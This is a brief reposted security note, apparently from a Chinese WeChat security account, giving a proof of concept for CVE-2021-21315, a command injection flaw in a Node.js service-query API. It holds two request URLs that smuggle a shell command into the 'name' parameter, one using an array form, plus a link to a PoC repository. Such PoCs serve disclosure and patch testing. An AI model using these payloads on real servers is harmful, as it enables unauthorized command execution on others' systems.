CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection
[PoC]
[Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)
[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)
https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
本文始发于微信公众号(安全鸭):CVE-2021-21315 Node.JS OS命令执行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论